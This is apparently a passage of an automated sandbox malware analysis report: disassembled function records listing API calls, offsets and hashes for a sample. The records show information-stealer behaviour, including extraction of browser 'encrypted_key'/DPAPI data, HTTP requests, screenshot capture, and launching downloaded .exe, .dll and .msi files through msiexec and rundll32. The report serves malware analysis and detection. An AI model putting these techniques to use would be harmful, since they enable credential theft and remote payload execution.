                                                                                      • Part of subcall function 02D2AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D2ABD9
                                                                                      • Part of subcall function 02D2AB87: lstrcat.KERNEL32(00000000), ref: 02D2ABE9
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 02D1622E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
                                                                                    • String ID:
                                                                                    • API String ID: 1703137719-0
                                                                                    • Opcode ID: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                                                                    • Instruction ID: 96f99395fc85c1bcad0b86bd74691735f8d2eb16473d18e2d1b2345d0f97d589
                                                                                    • Opcode Fuzzy Hash: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                                                                    • Instruction Fuzzy Hash: 7D12BC75950238EBCB15EBA0DD94EEEB37AFF64704F504199A10662690EF706F88CF60
                                                                                    APIs
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                      • Part of subcall function 02D2AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D2ABD9
                                                                                      • Part of subcall function 02D2AB87: lstrcat.KERNEL32(00000000), ref: 02D2ABE9
                                                                                      • Part of subcall function 02D2AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D2AB6C
                                                                                      • Part of subcall function 02D2AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D2AC2C
                                                                                      • Part of subcall function 02D2AC17: lstrcpy.KERNEL32(00000000), ref: 02D2AC6B
                                                                                      • Part of subcall function 02D2AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D2AC79
                                                                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0064A63C,00000000,?,0042144C,00000000,?,?), ref: 02D1CCD3
                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 02D1CCF0
                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 02D1CCFC
                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D1CD0F
                                                                                    • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 02D1CD1C
                                                                                    • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02D1CD40
                                                                                    • StrStrA.SHLWAPI(?,0064A1B0,00420B52), ref: 02D1CD5E
                                                                                    • StrStrA.SHLWAPI(00000000,0064A364), ref: 02D1CD85
                                                                                    • StrStrA.SHLWAPI(?,0064A4D0,00000000,?,00421458,00000000,?,00000000,00000000,?,0064A15C,00000000,?,00421454,00000000,?), ref: 02D1CF09
                                                                                    • StrStrA.SHLWAPI(00000000,0064A4CC), ref: 02D1CF20
                                                                                      • Part of subcall function 02D1CA87: memset.MSVCRT ref: 02D1CABA
                                                                                      • Part of subcall function 02D1CA87: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 02D1CAD8
                                                                                      • Part of subcall function 02D1CA87: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 02D1CAE3
                                                                                      • Part of subcall function 02D1CA87: memcpy.MSVCRT(?,?,?), ref: 02D1CB79
                                                                                    • StrStrA.SHLWAPI(?,0064A4CC,00000000,?,0042145C,00000000,?,00000000,0064A0DC), ref: 02D1CFC1
                                                                                    • StrStrA.SHLWAPI(00000000,0064A5A8), ref: 02D1CFD8
                                                                                      • Part of subcall function 02D1CA87: lstrcat.KERNEL32(?,00420B46), ref: 02D1CBAA
                                                                                      • Part of subcall function 02D1CA87: lstrcat.KERNEL32(?,00420B47), ref: 02D1CBBE
                                                                                      • Part of subcall function 02D1CA87: lstrcat.KERNEL32(?,00420B4E), ref: 02D1CBDF
                                                                                    • lstrlen.KERNEL32(00000000), ref: 02D1D0AB
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02D1D103
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                                                                    • String ID:
                                                                                    • API String ID: 3555725114-3916222277
                                                                                    • Opcode ID: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                                                                    • Instruction ID: 0d01f1e587d99b9c825b328ed44f816ccb071b7f6353643f4016deb745c86c0c
                                                                                    • Opcode Fuzzy Hash: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                                                                    • Instruction Fuzzy Hash: 08E1ED75900228EBCB14EFA4DD94EEEB77AEF64704F004159F106A6690EF346E89CF61
                                                                                    APIs
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,02E39740,00000000,?,0042144C,00000000,?,?), ref: 0040CA6C
                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CA89
                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0040CA95
                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CAA8
                                                                                    • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CAB5
                                                                                    • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CAD9
                                                                                    • StrStrA.SHLWAPI(?,02E397B8,00420B52), ref: 0040CAF7
                                                                                    • StrStrA.SHLWAPI(00000000,02E39728), ref: 0040CB1E
                                                                                    • StrStrA.SHLWAPI(?,02E3A1F0,00000000,?,00421458,00000000,?,00000000,00000000,?,02E35FB0,00000000,?,00421454,00000000,?), ref: 0040CCA2
                                                                                    • StrStrA.SHLWAPI(00000000,02E3A190), ref: 0040CCB9
                                                                                      • Part of subcall function 0040C820: memset.MSVCRT ref: 0040C853
                                                                                      • Part of subcall function 0040C820: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,02E35F60), ref: 0040C871
                                                                                      • Part of subcall function 0040C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                                                                      • Part of subcall function 0040C820: memcpy.MSVCRT(?,?,?), ref: 0040C912
                                                                                    • StrStrA.SHLWAPI(?,02E3A190,00000000,?,0042145C,00000000,?,00000000,02E35F60), ref: 0040CD5A
                                                                                    • StrStrA.SHLWAPI(00000000,02E35DE0), ref: 0040CD71
                                                                                      • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                                                                      • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                                                                      • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040CE44
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040CE9C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                                                                    • String ID:
                                                                                    • API String ID: 3555725114-3916222277
                                                                                    • Opcode ID: bdcf7920c9ab84c4787d47d5031650711a85c06ed1b0856f23742556519dcaf9
                                                                                    • Instruction ID: fb2464dfdb87d028b9341c66972094ccea7bc9213c5b9a6eafc00a4a54def107
                                                                                    • Opcode Fuzzy Hash: bdcf7920c9ab84c4787d47d5031650711a85c06ed1b0856f23742556519dcaf9
                                                                                    • Instruction Fuzzy Hash: 2FE13E71911108ABCB14FBA1DC91FEEB779AF14314F40416EF10673191EF386A9ACB6A
                                                                                    APIs
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • memset.MSVCRT ref: 00410C1C
                                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                                                                    • lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                                                                    • lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00410C88
                                                                                    • lstrcatA.KERNEL32(?,00420D84), ref: 00410C9A
                                                                                    • lstrlenA.KERNEL32(?), ref: 00410CA7
                                                                                    • memset.MSVCRT ref: 00410CCD
                                                                                    • memset.MSVCRT ref: 00410CE1
                                                                                      • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,02E342B0,?,0042110C,?,00000000), ref: 0041A82B
                                                                                      • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                                                      • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,02E04F30,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                      • Part of subcall function 004196C0: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00410B85,?,00000000,?,00000000,004205C6,004205C5), ref: 004196E1
                                                                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00410D5A
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00410D66
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                                                                    • String ID: .exe
                                                                                    • API String ID: 1395395982-4119554291
                                                                                    • Opcode ID: 74a2b4eb823f66a7a773147b1627efd196d727e2fc86b427189f4ea67f13cdff
                                                                                    • Instruction ID: 8c4414bd7b792449c86a3c64e171a12ac7102eaeec46e1acf96b3d3d4dd6cf75
                                                                                    • Opcode Fuzzy Hash: 74a2b4eb823f66a7a773147b1627efd196d727e2fc86b427189f4ea67f13cdff
                                                                                    • Instruction Fuzzy Hash: A78194B55111186BCB14FBA1CD52FEE7338AF44308F40419EB30A66082DE786AD9CF6E
                                                                                    APIs
                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0041906C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateGlobalStream
                                                                                    • String ID: image/jpeg
                                                                                    • API String ID: 2244384528-3785015651
                                                                                    • Opcode ID: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
                                                                                    • Instruction ID: d6dc09ab2bfedf2d54b470b914d8c7211c5e4dd185e8bb692af35d1d417654b8
                                                                                    • Opcode Fuzzy Hash: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
                                                                                    • Instruction Fuzzy Hash: 7D711B75A40208BBDB04EFE4DC99FEEB7B9FB48300F108509F515A7290DB38A945CB65
                                                                                    APIs
                                                                                    • strtok_s.MSVCRT ref: 00411307
                                                                                    • strtok_s.MSVCRT ref: 00411750
                                                                                      • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,02E342B0,?,0042110C,?,00000000), ref: 0041A82B
                                                                                      • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: strtok_s$lstrcpylstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 348468850-0
                                                                                    • Opcode ID: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                                                                                    • Instruction ID: 4a233ae47f87f64f9a2ed81d2cca976e3c75948f423937a2df4e62cfbc7c3e06
                                                                                    • Opcode Fuzzy Hash: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                                                                                    • Instruction Fuzzy Hash: C7C1D6B5941218ABCB14EF60DC89FEA7379BF54304F00449EF50AA7241DB78AAC5CF95
                                                                                    APIs
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • ShellExecuteEx.SHELL32(0000003C), ref: 004131C5
                                                                                    • ShellExecuteEx.SHELL32(0000003C), ref: 0041335D
                                                                                    • ShellExecuteEx.SHELL32(0000003C), ref: 004134EA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExecuteShell$lstrcpy
                                                                                    • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                                                                    • API String ID: 2507796910-3625054190
                                                                                    • Opcode ID: f416c3abd8d48d8571a1066b95692cbdeaad0712c422f8a8d0e8344c420d34f1
                                                                                    • Instruction ID: 17233f41fb1950bff335544576ea1941aa871c2d7c6c7a5a475621d351ca9112
                                                                                    • Opcode Fuzzy Hash: f416c3abd8d48d8571a1066b95692cbdeaad0712c422f8a8d0e8344c420d34f1
                                                                                    • Instruction Fuzzy Hash: 96125F718111089ADB09FBA1DD92FEEB778AF14314F50415EF10666091EF382BDACF6A
                                                                                    APIs
                                                                                    • memset.MSVCRT ref: 02D24505
                                                                                    • memset.MSVCRT ref: 02D2451C
                                                                                      • Part of subcall function 02D29047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02D29072
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D24553
                                                                                    • lstrcat.KERNEL32(?,0064A30C), ref: 02D24572
                                                                                    • lstrcat.KERNEL32(?,?), ref: 02D24586
                                                                                    • lstrcat.KERNEL32(?,0064A5D8), ref: 02D2459A
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                      • Part of subcall function 02D28FF7: GetFileAttributesA.KERNEL32(00000000,?,02D11DBB,?,?,0042565C,?,?,00420E1F), ref: 02D29006
                                                                                      • Part of subcall function 02D19F47: StrStrA.SHLWAPI(00000000,004212AC), ref: 02D19FA0
                                                                                      • Part of subcall function 02D19F47: memcmp.MSVCRT(?,0042125C,00000005), ref: 02D19FF9
                                                                                      • Part of subcall function 02D19C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02D19C53
                                                                                      • Part of subcall function 02D19C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 02D19C78
                                                                                      • Part of subcall function 02D19C27: LocalAlloc.KERNEL32(00000040,?), ref: 02D19C98
                                                                                      • Part of subcall function 02D19C27: ReadFile.KERNEL32(000000FF,?,00000000,02D116F6,00000000), ref: 02D19CC1
                                                                                      • Part of subcall function 02D19C27: LocalFree.KERNEL32(02D116F6), ref: 02D19CF7
                                                                                      • Part of subcall function 02D19C27: CloseHandle.KERNEL32(000000FF), ref: 02D19D01
                                                                                      • Part of subcall function 02D29627: GlobalAlloc.KERNEL32(00000000,02D24644,02D24644), ref: 02D2963A
                                                                                    • StrStrA.SHLWAPI(?,0064A0D8), ref: 02D2465A
                                                                                    • GlobalFree.KERNEL32(?), ref: 02D24779
                                                                                      • Part of subcall function 02D19D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,02D15155,00000000,00000000), ref: 02D19D56
                                                                                      • Part of subcall function 02D19D27: LocalAlloc.KERNEL32(00000040,?,?,?,02D15155,00000000,?), ref: 02D19D68
                                                                                      • Part of subcall function 02D19D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,02D15155,00000000,00000000), ref: 02D19D91
                                                                                      • Part of subcall function 02D19D27: LocalFree.KERNEL32(?,?,?,?,02D15155,00000000,?), ref: 02D19DA6
                                                                                      • Part of subcall function 02D1A077: memcmp.MSVCRT(?,00421264,00000003), ref: 02D1A094
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D2470A
                                                                                    • StrCmpCA.SHLWAPI(?,004208D1), ref: 02D24727
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 02D24739
                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 02D2474C
                                                                                    • lstrcat.KERNEL32(00000000,00420FB8), ref: 02D2475B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                                                    • String ID:
                                                                                    • API String ID: 1191620704-0
                                                                                    • Opcode ID: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                                                                    • Instruction ID: 9a2b76be05f084c9cf40e4b4c95fd11840db9e7e81d1fa200c8082b7fd0ff0ce
                                                                                    • Opcode Fuzzy Hash: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                                                                    • Instruction Fuzzy Hash: 527132B5900218BBDB14EBE0DC55FEE737AEF59304F008598A605A7280DA75DB49CFA1
                                                                                    APIs
                                                                                    • memset.MSVCRT ref: 0041429E
                                                                                    • memset.MSVCRT ref: 004142B5
                                                                                      • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 004142EC
                                                                                    • lstrcatA.KERNEL32(?,02E39C68), ref: 0041430B
                                                                                    • lstrcatA.KERNEL32(?,?), ref: 0041431F
                                                                                    • lstrcatA.KERNEL32(?,02E39848), ref: 00414333
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                      • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                                                                      • Part of subcall function 00409CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                                                                      • Part of subcall function 00409CE0: memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                                                                      • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                                                      • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                                                      • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                                                      • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                                                      • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                                                      • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                                                      • Part of subcall function 004193C0: GlobalAlloc.KERNEL32(00000000,004143DD,004143DD), ref: 004193D3
                                                                                    • StrStrA.SHLWAPI(?,02E39B90), ref: 004143F3
                                                                                    • GlobalFree.KERNEL32(?), ref: 00414512
                                                                                      • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                                                                      • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                                                                      • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                                                                      • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                                                                      • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 004144A3
                                                                                    • StrCmpCA.SHLWAPI(?,004208D1), ref: 004144C0
                                                                                    • lstrcatA.KERNEL32(00000000,00000000), ref: 004144D2
                                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 004144E5
                                                                                    • lstrcatA.KERNEL32(00000000,00420FB8), ref: 004144F4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                                                    • String ID:
                                                                                    • API String ID: 1191620704-0
                                                                                    • Opcode ID: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
                                                                                    • Instruction ID: 36ee7f3ac4f34f2e69ac811a17adbc1f593ee72d5fdd25ff7e799b1d0bb6bc25
                                                                                    • Opcode Fuzzy Hash: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
                                                                                    • Instruction Fuzzy Hash: 0B7165B6900208BBDB14FBE0DC85FEE7379AB88304F00459DF605A7181EA78DB55CB95
                                                                                    APIs
                                                                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                      • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                                                                      • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,02E35CA0), ref: 00406303
                                                                                      • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                                                                      • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,02E3AE58,00000000,00000000,00400100,00000000), ref: 00406385
                                                                                      • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                                                                      • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                                                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0041532F
                                                                                      • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                                                    • StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00415383
                                                                                    • strtok.MSVCRT(00000000,?), ref: 0041539E
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 004153AE
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
